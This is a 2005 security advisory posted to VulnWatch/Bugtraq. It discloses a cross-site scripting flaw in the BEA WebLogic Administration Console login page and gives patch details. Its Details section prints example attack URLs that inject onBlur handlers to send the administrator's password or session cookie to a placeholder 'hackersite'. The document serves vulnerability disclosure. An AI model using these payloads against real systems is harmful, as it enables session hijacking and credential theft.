[VulnWatch] [AppSecInc Advisory BEA05-V0101] BEA WebLogic Administration Console login page cross-site scripting vulnerability

From: Team SHATTER (shatter_at_appsecinc.com)
Date: 05/27/05

  • Next message: Team SHATTER: "[VulnWatch] [AppSecInc Advisory BEA05-V0100] BEA WebLogic Administration Console error page cross-site scripting vulnerability"
    Date: Fri, 27 May 2005 14:26:02 -0400
    To: bugtraq@securityfocus.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
     
    BEA WebLogic Administration Console login page cross-site scripting
    vulnerability

    AppSecInc Team SHATTER Security Advisory BEA05-V0101
    http://www.appsecinc.com/resources/alerts/general/BEA-002.html
    May 27, 2005

    Affected versions: BEA WebLogic Server 7.0 and 8.1

    Risk level: High

    Credits: This vulnerability was discovered and researched by Agustín
    Martínez Fayó of Argeniss for Application Security Inc.

    Background:
    The Administration Console is a web browser-based, graphical user
    interface used to manage a WebLogic Server domain. The Administration
    Console supports a full range of product administrative tasks. A
    cross-site scripting vulnerability exists in the login page of the
    Console.

    Details:
    Cross-site scripting vulnerabilities occur when an attacker tricks a
    legitimate web application into sending malicious code, generally in
    the form of a script, to an unsuspecting end user. The attack usually
    involves crafting a hyperlink with malicious script code embedded
    within it. A valid user is likely to click this link since it points
    to a resource on a trusted domain. The link can be posted on a web
    page, or sent in an instant message, or email. Clicking on the link
    executes the attacker-injected code in the context of the trusted web
    application. Typically, the code steals session cookies, which can
    then be used to impersonate a valid user.

    The "j_username" and "j_password" parameters in the login page of the
    Administration Console are vulnerable to cross-site scripting attacks.
    User supplied input to these parameters is returned without proper
    sanitization, allowing a malicious attacker to inject arbitrary
    scripting code.

    Below are some examples of the hyperlinks an attacker could use.

    Steal administrator's password:
    http://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.all.j_password.value)"
    Get the session cookie :
    http://vulnerablesite:7001/console/login/LoginForm.jsp?j_username=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)"
    or
    http://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)"

    Impact:
    Attackers can steal administrator's session cookies and password,
    thereby allowing the attacker to impersonate the valid user.

    Workaround:
    There is no workaround for this issue.

    Vendor Status:
    Vendor was contacted and a patch was released.

    Fix:
    For BEA WebLogic Server and WebLogic Express 8.1 upgrade to Service
    Pack 4. Apply the patch on top of it located at
    ftp://ftpna.bea.com/pub/releases/security/CR202495_810sp4.jar on top
    of the service packs.
    For BEA WebLogic Server and WebLogic Express 7.0 upgrade to Service
    Pack 6. Apply the patch located at
    ftp://ftpna.bea.com/pub/releases/security/CR214457_700sp6.jar on top
    of the service packs.

    Links:
    Application Security, Inc advisory:
    http://www.appsecinc.com/resources/alerts/general/BEA-002.html
    BEA Advisory: http://dev2dev.bea.com/pub/advisory/130

    - --
    _____________________________________________
    Application Security, Inc.
    www.appsecinc.com
    AppSecInc is the leading provider of database security solutions for
    the enterprise. AppSecInc products proactively secure enterprise
    applications at more than 300 organizations around the world by
    discovering, assessing, and protecting the database against rapidly
    changing security threats. By securing data at its source, we enable
    organizations to more confidently extend their business with
    customers, partners and suppliers. Our security experts, combined with
    our strong support team, deliver up-to-date application safeguards
    that minimize risk and eliminate its impact on business.

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.0 (MingW32)
     
    iD8DBQFCl2Y6/0w1dSVRt4URAhQwAKC+9c6nxvg2cpofISbUXrVhxe8OoACfRrUG
    aicgogs0F29Arn6TJLA5gyg=
    =KXCI
    -----END PGP SIGNATURE-----


  • Next message: Team SHATTER: "[VulnWatch] [AppSecInc Advisory BEA05-V0100] BEA WebLogic Administration Console error page cross-site scripting vulnerability"